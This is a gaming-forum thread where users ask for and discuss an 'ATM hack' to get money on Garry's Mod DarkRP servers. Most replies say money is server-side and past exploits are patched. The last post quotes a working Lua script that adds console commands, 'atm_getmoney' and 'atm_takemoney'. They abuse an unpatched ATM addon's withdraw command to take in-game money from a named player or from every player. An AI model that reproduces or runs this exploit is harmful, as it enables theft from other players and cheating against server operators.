ATM Hack

Posts 113 of 13 · Page 1 of 1
ATM Hack
If any of you have a atm hack that works please post below \/\/\/\/\/\/\/\/\/\/\/\/\/
Quote Originally Posted by Badone43 View Post
If any of you have a atm hack that works please post below \/\/\/\/\/\/\/\/\/\/\/\/\/
Correct me if I'm wrong, as I don't know anything about this. But I think it would be server sided (if you're talking about darkrp) money is pretty much always server sided otherwise people could use cheatengine to change the values.
Plus, even if it did exist it'd probably get you banned off of so many servers, but if you do find one be sure to share it
Quote Originally Posted by soipelez View Post
Correct me if I'm wrong, as I don't know anything about this. But I think it would be server sided (if you're talking about darkrp) money is pretty much always server sided otherwise people could use cheatengine to change the values.
Plus, even if it did exist it'd probably get you banned off of so many servers, but if you do find one be sure to share it
Yeah I agree, plus how would it work? I think most servers use a MySQL database or something similar that stores this information.
Well, here's a simplified explanation to what my understanding is the reality of the situation right now.
- First of all, as stated above, you can't directly hack money as is, you COULD however hack your income previously.
How? You sort of sped up the daily income to give yourself money that way.

Along with the dupes that can be found on and off, as far as I know, about everything you could previously have done for money, is now patched.
Quote Originally Posted by Gray View Post
Well, here's a simplified explanation to what my understanding is the reality of the situation right now.
- First of all, as stated above, you can't directly hack money as is, you COULD however hack your income previously.
How? You sort of sped up the daily income to give yourself money that way.

Along with the dupes that can be found on and off, as far as I know, about everything you could previously have done for money, is now patched.
Very well "Explained"
Quote Originally Posted by LukeKesnaw View Post
Very well "Explained"
Very pointless "Post"
Quote Originally Posted by LordOfGears2 View Post
Very pointless "Post"
So is yours.. haha idiot
Quote Originally Posted by Gray View Post
Well, here's a simplified explanation to what my understanding is the reality of the situation right now.
- First of all, as stated above, you can't directly hack money as is, you COULD however hack your income previously.
How? You sort of sped up the daily income to give yourself money that way.

Along with the dupes that can be found on and off, as far as I know, about everything you could previously have done for money, is now patched.
Still, I suppose that information is server sided, so there really isn't any access to that, unless..
It's not really his fault for replying to a dumb post from you to begin with. If you posted a pointless post, it's just as equally pointless as for him to reply to it, but there's no need to call him an idiot for replying to your thread in the first place.

So with all due respects, you, sir, are the idiot.

(Just thought I'd point that out for you)
Pretty sure, its only serverside. Maybe, there would be a way, "maybe." I doubt there be anyway tho.
well try plutoniumdust atm hack
There is an atm hack it works on some servers which have not patched it, go onto sticky scripts thread.
I found one, it only works on some servers and I read nitrousrp is one of them, can't find it in the server browser though.
- Edit -
I went on nitrous server's website and found their darkrp one, sadly they removed the atm mod ): Please post a visitor message on my profile if you find one that works (:

Quote Originally Posted by LennyPenny View Post
Money stealer I posted a while ago but got deleted. Not going to risk a ban again so I'll just provide the script.

Description: Note: Works only on some servers using the darkrp atm addon, some servers fixed this exploit already.

To steal money from a specific person, run this console command: atm_getmoney [name of person] [amount of money you want to steal]
(this was made by a facepunch user)

To steal money from every account, run this console command: atm_takemoney [amound of money you want to take from every account]
(made by me, but based off of the above)

Errors will appear.

Credits: Random facepunch user + me

Code:
concommand.Add( "atm_getmoney", function(ply, cmd, args)

	local name = args[1]
	local money = args[2]

	if not money or not name then
		chat.AddText( nil, cmd.." name money" )
		return
	end

	local vict
	for k,v in pairs(player.GetAll()) do
		if string.find( v:Nick(), name ) then
			vict = v
			break
		end
	end

	if not IsValid(vict) then
		chat.AddText( nil, "No player found with "..name.." in their name." )
                return
	end

	chat.AddText( nil, "Attempting to take $"..money.." from "..vict:Nick().."." )
	RunConsoleCommand( "rp_atm_withdraw", "", vict:UniqueID(), money )

end )

concommand.Add("atm_takemoney", function(players, command, args)
	for k, v in pairs(player.GetAll()) do
		RunConsoleCommand("atm_getmoney", ""..v:GetName().."", args[1])
	end
end)
Posts 113 of 13 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Need help?